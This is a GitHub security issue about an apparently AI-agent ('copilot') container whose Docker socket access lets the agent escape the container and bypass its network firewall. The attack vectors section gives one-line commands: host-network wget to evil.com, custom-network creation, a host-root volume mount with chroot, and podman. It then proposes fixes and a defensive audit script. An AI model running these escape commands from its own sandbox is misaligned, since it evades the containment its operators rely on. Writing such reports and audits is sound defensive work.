
[Security] Docker socket access allows container escape and firewall bypass #10

@Mossaka


Priority

Critical

Description

The copilot container has full access to the Docker socket (/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.

Attack vectors

1. Bypass docker-wrapper directly

/usr/bin/docker-real run --network host alpine wget https://evil.com

2. Create custom network

docker network create bypass-net
docker run --network bypass-net alpine wget https://evil.com

3. Volume mount escape

docker run -v /:/host alpine chroot /host bash

4. Alternative container runtimes

apt-get install podman
podman run --network host alpine wget https://evil.com

Current mitigations (insufficient)

  • docker-wrapper.sh intercepts the docker command but is easily bypassed
  • Host-level iptables rules only filter the awf-net bridge, not custom networks
  • The wrapper blocks --privileged, --network host and --add-host, but can be bypassed

Code locations

  • src/docker-manager.ts:223-224 - Docker socket mount
  • containers/copilot/docker-wrapper.sh - Wrapper script (bypassable)
  • containers/copilot/Dockerfile:34-35 - Symlink setup

Proposed solutions

Option A: Remove Docker socket access (breaking change)

  • Pros: Simplest, most secure
  • Cons: Breaks MCP servers that need Docker (Playwright, etc.)
  • Implementation: Remove socket mount, document that users must spawn Docker-based MCPs outside firewall

Option B: Use docker-socket-proxy

  • Pros: Restricts Docker API calls, maintains auto-spawn functionality
  • Cons: Adds complexity, still allows network creation
  • Implementation: Add docker-socket-proxy container, configure to block dangerous operations
  • Reference: https://github.com/Tecnativa/docker-socket-proxy

Option C: Enforce awf-net for all networks (host-level)

  • Pros: Prevents custom network bypass
  • Cons: Complex iptables rules, doesn't prevent volume escapes
  • Implementation: Add iptables rules to block/filter all Docker networks except awf-net

Option D: AppArmor/SELinux profiles

  • Pros: Fine-grained control
  • Cons: Very complex, platform-specific
  • Implementation: Docker security profiles restricting socket operations

Recommendation

Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.
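Whichever option is chosen, it is worth having a check that flags the configurations this issue describes (socket mount, host root mount, privileged, host networking, networks other than awf-net) from `docker inspect` output. The script below is an added example, not code from this project; the inspect records are constructed, and the allowed-network set is an assumption based on the awf-net bridge named above.

```python
import json

DOCKER_SOCKET = "/var/run/docker.sock"
ALLOWED_NETWORKS = {"awf-net"}  # assumption: the firewalled bridge from the issue


def audit_container(info: dict) -> list[str]:
    """Return findings for one `docker inspect` record (dict shape as emitted by Docker)."""
    findings = []
    host = info.get("HostConfig", {})
    if host.get("Privileged"):
        findings.append("privileged")
    mode = host.get("NetworkMode", "")
    if mode == "host":
        findings.append("host-network")
    elif mode not in ALLOWED_NETWORKS:
        findings.append(f"network-outside-firewall:{mode}")
    # Bind mounts can show up in Mounts and/or HostConfig.Binds ("src:dst[:opts]")
    sources = {m.get("Source", "") for m in info.get("Mounts", [])}
    sources |= {b.split(":")[0] for b in (host.get("Binds") or [])}
    for src in sorted(sources):
        if src == DOCKER_SOCKET:
            findings.append("docker-socket-mount")
        elif src == "/":
            findings.append("host-root-mount")
    return findings


def audit_all(inspect_output: str) -> dict[str, list[str]]:
    """Map container name -> findings for the JSON array printed by `docker inspect`."""
    return {c["Name"].lstrip("/"): audit_container(c) for c in json.loads(inspect_output)}


# Constructed sample: the copilot container with the socket mount, and a container
# launched with the escape flags from the attack vectors above.
SAMPLE = json.dumps([
    {"Name": "/copilot",
     "HostConfig": {"Privileged": False, "NetworkMode": "awf-net",
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
     "Mounts": [{"Type": "bind", "Source": DOCKER_SOCKET, "Destination": DOCKER_SOCKET}]},
    {"Name": "/escape",
     "HostConfig": {"Privileged": True, "NetworkMode": "host", "Binds": ["/:/host"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}]},
])

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE).items():
        print(name, findings or "ok")
```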
